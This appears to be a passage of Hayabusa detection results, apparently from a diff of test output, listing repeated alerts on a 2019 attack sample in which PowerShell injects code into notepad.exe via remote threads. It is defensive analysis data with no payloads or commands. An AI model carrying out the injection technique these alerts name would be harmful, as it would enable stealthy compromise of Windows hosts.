+2019-05-19 02:16:16.739 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.755 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.770 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.801 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.817 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.833 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.848 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.864 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.880 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.895 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.926 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.942 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.973 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.989 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.005 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.020 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.036 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.051 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.083 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.098 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.114 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.130 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.145 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
